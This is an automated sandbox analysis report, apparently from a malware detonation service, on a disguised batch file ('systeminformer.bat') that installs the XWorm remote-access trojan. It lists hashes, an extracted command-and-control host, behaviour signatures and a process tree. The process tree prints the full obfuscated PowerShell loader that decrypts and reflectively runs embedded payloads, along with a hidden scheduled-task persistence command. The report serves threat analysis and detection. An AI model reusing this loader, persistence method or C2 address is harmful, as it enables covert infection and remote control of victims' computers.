Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
27-06-2024 07:31
Static task
static1
Behavioral task
behavioral1
Sample
systeminformer.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
systeminformer.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
systeminformer.bat
Resource
win11-20240419-en
General
-
Target
systeminformer.bat
-
Size
408KB
-
MD5
34d172bddcf176f4a3c85f2b8083850c
-
SHA1
6e4fd033d2ed62b464db43b6af1f5bb0e9283a46
-
SHA256
ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42
-
SHA512
c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516
-
SSDEEP
12288:z4MdFDVqDtPSt2dbWRZpti8C6lhzFAxsbmC:z4UoSCAjti8C6l9eHC
Malware Config
Extracted
xworm
case-shield.gl.at.ply.gg:26501
-
Install_directory
%Userprofile%
-
install_file
system.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4500-50-0x000001F158540000-0x000001F15855A000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 4500 powershell.exe 23 4500 powershell.exe 40 4500 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3344 powershell.exe 2860 powershell.exe 4224 powershell.exe 1204 powershell.exe 4500 powershell.exe 4168 powershell.exe 2952 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 212 system.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\system svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 42 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4576 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4168 powershell.exe 4168 powershell.exe 2952 powershell.exe 2952 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 3344 powershell.exe 3344 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 2860 powershell.exe 2860 powershell.exe 4224 powershell.exe 4224 powershell.exe 1204 powershell.exe 1204 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe Token: 36 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe Token: 36 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 powershell.exe Token: SeSecurityPrivilege 2952 powershell.exe Token: SeTakeOwnershipPrivilege 2952 powershell.exe Token: SeLoadDriverPrivilege 2952 powershell.exe Token: SeSystemProfilePrivilege 2952 powershell.exe Token: SeSystemtimePrivilege 2952 powershell.exe Token: SeProfSingleProcessPrivilege 2952 powershell.exe Token: SeIncBasePriorityPrivilege 2952 powershell.exe Token: SeCreatePagefilePrivilege 2952 powershell.exe Token: SeBackupPrivilege 2952 powershell.exe Token: SeRestorePrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeSystemEnvironmentPrivilege 2952 powershell.exe Token: SeRemoteShutdownPrivilege 2952 powershell.exe Token: SeUndockPrivilege 2952 powershell.exe Token: SeManageVolumePrivilege 2952 powershell.exe Token: 33 2952 powershell.exe Token: 34 2952 powershell.exe Token: 35 2952 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4500 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3132 wrote to memory of 2876 3132 cmd.exe 82 PID 3132 wrote to memory of 2876 3132 cmd.exe 82 PID 3132 wrote to memory of 4168 3132 cmd.exe 83 PID 3132 wrote to memory of 4168 3132 cmd.exe 83 PID 4168 wrote to memory of 2952 4168 powershell.exe 87 PID 4168 wrote to memory of 2952 4168 powershell.exe 87 PID 4168 wrote to memory of 4652 4168 powershell.exe 90 PID 4168 wrote to memory of 4652 4168 powershell.exe 90 PID 4652 wrote to memory of 4692 4652 WScript.exe 91 PID 4652 wrote to memory of 4692 4652 WScript.exe 91 PID 4692 wrote to memory of 1988 4692 cmd.exe 93 PID 4692 wrote to memory of 1988 4692 cmd.exe 93 PID 4692 wrote to memory of 4500 4692 cmd.exe 94 PID 4692 wrote to memory of 4500 4692 cmd.exe 94 PID 4500 wrote to memory of 3488 4500 powershell.exe 56 PID 4500 wrote to memory of 1768 4500 powershell.exe 32 PID 4500 wrote to memory of 1564 4500 powershell.exe 27 PID 4500 wrote to memory of 2104 4500 powershell.exe 39 PID 4500 wrote to memory of 1156 4500 powershell.exe 20 PID 4500 wrote to memory of 952 4500 powershell.exe 12 PID 4500 wrote to memory of 1736 4500 powershell.exe 31 PID 4500 wrote to memory of 1932 4500 powershell.exe 36 PID 4500 wrote to memory of 748 4500 powershell.exe 14 PID 4500 wrote to memory of 2716 4500 powershell.exe 48 PID 4500 wrote to memory of 3104 4500 powershell.exe 86 PID 4500 wrote to memory of 1328 4500 powershell.exe 23 PID 4500 wrote to memory of 1456 4500 powershell.exe 26 PID 4500 wrote to memory of 1100 4500 powershell.exe 19 PID 4500 wrote to memory of 900 4500 powershell.exe 11 PID 4500 wrote to memory of 2676 4500 powershell.exe 66 PID 4500 wrote to memory of 2076 4500 powershell.exe 38 PID 4500 wrote to memory of 892 4500 powershell.exe 16 PID 4500 wrote to memory of 1088 4500 powershell.exe 18 PID 4500 wrote to memory of 3360 4500 powershell.exe 54 PID 4500 wrote to memory of 1080 4500 powershell.exe 17 PID 4500 wrote to memory of 1276 4500 powershell.exe 22 PID 4500 wrote to memory of 1860 4500 powershell.exe 34 PID 4500 wrote to memory of 1444 4500 powershell.exe 25 PID 4500 wrote to memory of 1464 4500 powershell.exe 70 PID 4500 wrote to memory of 1660 4500 powershell.exe 30 PID 4500 wrote to memory of 2644 4500 powershell.exe 46 PID 4500 wrote to memory of 1852 4500 powershell.exe 33 PID 4500 wrote to memory of 3032 4500 powershell.exe 52 PID 4500 wrote to memory of 860 4500 powershell.exe 15 PID 4500 wrote to memory of 2228 4500 powershell.exe 40 PID 4500 wrote to memory of 1628 4500 powershell.exe 29 PID 4500 wrote to memory of 2412 4500 powershell.exe 43 PID 4500 wrote to memory of 5064 4500 powershell.exe 69 PID 4500 wrote to memory of 3588 4500 powershell.exe 57 PID 4500 wrote to memory of 2404 4500 powershell.exe 42 PID 4500 wrote to memory of 1220 4500 powershell.exe 21 PID 4500 wrote to memory of 2792 4500 powershell.exe 51 PID 4500 wrote to memory of 1412 4500 powershell.exe 24 PID 4500 wrote to memory of 816 4500 powershell.exe 67 PID 4500 wrote to memory of 2784 4500 powershell.exe 50 PID 4500 wrote to memory of 1868 4500 powershell.exe 35 PID 4500 wrote to memory of 2772 4500 powershell.exe 68 PID 4500 wrote to memory of 788 4500 powershell.exe 10 PID 4500 wrote to memory of 2572 4500 powershell.exe 45 PID 4500 wrote to memory of 2308 4500 powershell.exe 41 PID 4500 wrote to memory of 1584 4500 powershell.exe 28 PID 4500 wrote to memory of 3344 4500 powershell.exe 96 PID 4500 wrote to memory of 3344 4500 powershell.exe 96 PID 4500 wrote to memory of 2860 4500 powershell.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:788
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:1372
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding2⤵PID:1076
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:892
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1100 -
C:\Users\Admin\system.exeC:\Users\Admin\system.exe2⤵
- Executes dropped EXE
PID:212
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3360
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\systeminformer.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Local\Temp\systeminformer.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_133_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_133.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_133.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_133.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zppN17iXtrCN9R2seJEth9hA/unISVpEyKgytiMsEXg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4HYls8iOlhSjNY1hAkSsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jLbjH=New-Object System.IO.MemoryStream(,$param_var); $rbzqc=New-Object System.IO.MemoryStream; $LPpaN=New-Object System.IO.Compression.GZipStream($jLbjH, [IO.Compression.CompressionMode]::Decompress); $LPpaN.CopyTo($rbzqc); $LPpaN.Dispose(); $jLbjH.Dispose(); $rbzqc.Dispose(); $rbzqc.ToArray();}function execute_function($param_var,$param2_var){ $NeELi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OenrY=$NeELi.EntryPoint; $OenrY.Invoke($null, $param2_var);}$rPKgK = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_133.bat';$host.UI.RawUI.WindowTitle = $rPKgK;$pVvBN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rPKgK).Split([Environment]::NewLine);foreach ($VGOfr in $pVvBN) { if ($VGOfr.StartsWith('vcAjailoeyOprdqWzxUu')) { $mEApY=$VGOfr.Substring(20); break; }}$payloads_var=[string[]]$mEApY.Split('\');$payload1_var=decompress_function 